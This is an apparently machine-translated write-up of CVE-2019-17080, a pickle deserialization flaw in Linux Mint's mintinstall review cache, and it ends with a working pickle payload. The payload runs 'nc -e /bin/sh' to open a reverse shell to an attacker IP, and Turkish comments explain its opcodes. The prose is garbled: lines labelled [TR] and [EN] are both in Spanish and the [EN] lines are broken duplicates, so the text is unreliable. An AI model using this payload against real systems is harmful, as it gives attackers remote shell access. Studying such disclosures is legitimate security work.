
CVE-2019-17080
[TR] El administrador de software de Linux Mint (v 7.9.5/9) provoca la inyección de objetos y la ejecución de código arbitrario debido a una configuración incorrecta.
[EN] El administrador de software de Linux Mint (v 7.9.5/9) nos hace ejecutar inyección de objetos y código arbitrario debido a una configuración incorrecta.
mintinsall
[TR] Al ejecutar el administrador de software de Mint, comprueba si hay comentarios nuevos; si los hay, descarga new-reviews.list desde la dirección y lo escribe en el archivo.
[EN] Si hay un comentario nuevo, new-reviews.list descargar desde y escribir en el archivo.

code mintinstall.py
[TR] Cuando el administrador de software se inicia por primera vez, llama a la clase ReviewCache() del módulo reviews.
[EN] Cuando el administrador de software se inicia por primera vez, llama a la clase ReviewCache() del módulo reviews.

code reviews.py
[TR] Cuando la clase ReviewCache comienza (init), llama a la función _load_cache().
[EN] Cuando la clase ReviewCache se inicia (), llama a _load_cache().

[TR] La función Load cache lee el archivo que está en la variable REVIEWS_CACHE y deserializa los datos del archivo con la ayuda del módulo pickle, guardando algunos valores en la memoria.
[EN] La función Load cache lee el archivo en la variable REVIEWS_CACHE, deserializa los datos del archivo con la ayuda del módulo pickle y conserva algunos valores en la memoria.

[TR] Cuando compruebo el archivo, parece que tengo permiso de escritura.
[EN] Cuando reviso el archivo, parece que tengo permiso de escritura.

[TR] Gracias al módulo Pickle, podemos realizar operaciones de serialización/deserialización; así, podemos incluir el módulo mediante el método reduce y ejecutar código arbitrario.
[EN] Pickle ya que podemos realizar operaciones de serialización/deserialización con el módulo, podemos incluir el módulo y ejecutar código arbitrario usando el método reduce.

[TR] En este caso, si se intenta deserializar el archivo, nuestro código malicioso se ejecutará.
[EN] Si intentas deserializar el archivo, nuestro código malicioso se ejecutará.
cos
system
(S'nc -e /bin/sh 192.168.2.138 4545'
tR.
>>modül adı c{os}
>> fonksiyon
( >> işaretleyici nesnesi
S >> tırnak sonuna kadar okuyup stack'e at
tR. >> stackte olanları çagır ve sonucu stacke yerleştir.

